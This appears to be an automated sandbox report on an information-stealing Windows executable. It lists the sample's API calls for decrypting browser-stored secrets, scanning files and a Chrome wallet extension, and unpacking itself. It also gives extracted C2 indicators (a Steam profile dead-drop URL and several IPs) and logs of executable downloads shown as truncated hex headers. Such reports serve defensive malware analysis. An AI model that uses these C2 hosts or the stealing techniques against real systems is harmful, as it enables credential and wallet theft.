Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C276C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	10_2_6C276C80
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	10_2_6C3CA9A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C394420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	10_2_6C394420
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3C4440 PK11_PrivDecrypt,	10_2_6C3C4440
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3C44C0 PK11_PubEncrypt,	10_2_6C3C44C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C4125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	10_2_6C4125B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3A8670 PK11_ExportEncryptedPrivKeyInfo,	10_2_6C3A8670
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C3CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	10_2_6C3CA650

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Unpacked PE file: 10.2.build_2024-07-25_20-56.exe.19150000.4.unpack
Source: C:\ProgramData\CFHIIJDBKE.exe	Unpacked PE file: 11.2.CFHIIJDBKE.exe.3350000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Unpacked PE file: 10.2.build_2024-07-25_20-56.exe.400000.1.unpack

Source: IRqsWvBBMc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:60783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:60785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.6:60800 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: build_2024-07-25_20-56.exe, 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.10.dr
Source:	Binary string: freebl3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.10.dr
Source:	Binary string: freebl3.pdbp source: build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.10.dr
Source:	Binary string: nss3.pdb@ source: build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: server.exe, 00000009.00000002.2951247968.000002154A196000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953748985.000002154C190000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953613503.000002154BF96000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949871501.0000021549197000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950026853.0000021549398000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952821135.000002154B394000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951676613.000002154A596000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952244888.000002154AB9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952028567.000002154A99A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953075860.000002154B79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953342918.000002154BB9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950201489.0000021549599000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953481772.000002154BD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951868489.000002154A79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952948313.000002154B59D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950724116.0000021549B90000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950902814.0000021549D9D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953209514.000002154B990000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951426592.000002154A393000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952693189.000002154B198000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950549608.0000021549992000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951082794.0000021549F9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952559231.000002154AF9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952409232.000002154AD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950380023.0000021549795000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: server.exe, 00000009.00000002.2951247968.000002154A196000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953748985.000002154C190000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953613503.000002154BF96000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949871501.0000021549197000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950026853.0000021549398000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952821135.000002154B394000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951676613.000002154A596000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952244888.000002154AB9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952028567.000002154A99A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953075860.000002154B79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953342918.000002154BB9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950201489.0000021549599000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953481772.000002154BD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951868489.000002154A79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952948313.000002154B59D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950724116.0000021549B90000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950902814.0000021549D9D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953209514.000002154B990000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951426592.000002154A393000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952693189.000002154B198000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950549608.0000021549992000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951082794.0000021549F9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952559231.000002154AF9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952409232.000002154AD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950380023.0000021549795000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3425240612.000000003B947000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.10.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3410147281.000000002FA6D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.10.dr
Source:	Binary string: nss3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.10.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00401110
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_004099F0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	10_2_0040A2C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	10_2_004156C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040C2E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00415EA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	10_2_00414F80
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040B390
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00409D40
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	10_2_00415A70
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	10_2_0040AAB0

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

10_2_004153C0

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199747278259
Source: Malware configuration extractor	IPs: 185.215.113.16

Source: global traffic

TCP traffic: 192.168.2.6:60854 -> 91.92.250.213:1110

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 10:57:04 GMTContent-Type: application/octet-streamContent-Length: 2711040Last-Modified: Fri, 26 Jul 2024 09:19:06 GMTConnection: keep-aliveETag: "66a36a0a-295e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 20 50 a2 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 0e 27 00 00 5a 29 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 30 00 00 04 00 00 71 45 2a 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 2f 00 0c 05 00 00 00 10 30 00 38 01 00 00 00 e0 28 00 8c 4c 00 00 00 00 00 00 00 00 00 00 00 20 30 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 28 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e1 2f 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 0d 27 00 00 10 00 00 00 0e 27 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 e6 00 00 00 20 27 00 00 e8 00 00 00 12 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 98 c3 00 00 00 10 28 00 00 c4 00 00 00 fa 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 8c 4c 00 00 00 e0 28 00 00 4e 00 00 00 be 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 d4 41 00 00 00 30 29 00 00 42 00 00 00 0c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 90 5e 06 00 00 80 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 0c 05 00 00 00 e0 2f 00 00 06 00 00 00 4e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 58 00 00 00 00 f0 2f 00 00 02 00 00 00 54 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 30 00 00 02 00 00 00 56 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 01 00 00 00 10 30 00 00 02 00 00 00 58 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 03 00 00 00 20 30 00 00 04 00 00 00 5a 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 10:57:08 GMTContent-Type: application/octet-streamContent-Length: 356864Last-Modified: Fri, 26 Jul 2024 09:18:51 GMTConnection: keep-aliveETag: "66a369fb-57200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b 95 bc 4b 0f f4 d2 18 0f f4 d2 18 0f f4 d2 18 60 82 79 18 17 f4 d2 18 60 82 4c 18 1f f4 d2 18 60 82 78 18 50 f4 d2 18 06 8c 41 18 06 f4 d2 18 0f f4 d3 18 7c f4 d2 18 60 82 7d 18 0e f4 d2 18 60 82 48 18 0e f4 d2 18 60 82 4f 18 0e f4 d2 18 52 69 63 68 0f f4 d2 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d5 49 3e 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 a2 03 00 00 8c 03 02 00 00 00 00 bc 1f 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 07 02 00 04 00 00 2d d0 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 e7 03 00 64 00 00 00 00 10 06 02 d6 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e8 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 e2 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 a0 03 00 00 10 00 00 00 a2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8a 31 00 00 00 c0 03 00 00 32 00 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 08 02 02 00 00 04 00 00 b6 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d6 e3 00 00 00 10 06 02 00 e4 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 26 Jul 2024 10:30:50 GMTAccept-Ranges: bytesETag: "dab2e2e246dfda1:0"Server: Microsoft-IIS/10.0Date: Fri, 26 Jul 2024 10:57:48 GMTContent-Length: 12016128Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 c9 72 a3 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c2 8b 00 00 94 2b 00 00 00 00 00 a0 d0 8b 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 d0 b9 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 60 9a 00 99 00 00 00 00 60 99 00 22 50 00 00 00 e0 a8 00 00 e4 10 00 00 10 a2 00 9c c9 06 00 00 00 00 00 00 00 00 00 00 90 9a 00 9c 7f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9a 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 74 99 00 00 13 00 00 00 c0 99 00 0c 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 c1 8b 00 00 10 00 00 00 c2 8b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 7d 0b 00 00 e0 8b 00 00 7e 0b 00 00 c6 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 2c f1 01 00 00 60 97 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 22 50 00 00 00 60 99 00 00 52 00 00 00 44 97 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 0c 91 00 00 00 c0 99 00 00 92 00 00 00 96 97 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 99 00 00 00 00 60 9a 00 00 02 00 00 00 28 98 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 e4 01 00 00 00 70 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 80 9a 00 00 02 00 00 00 2a 98 00 00 00 00 00 00 00 00 00 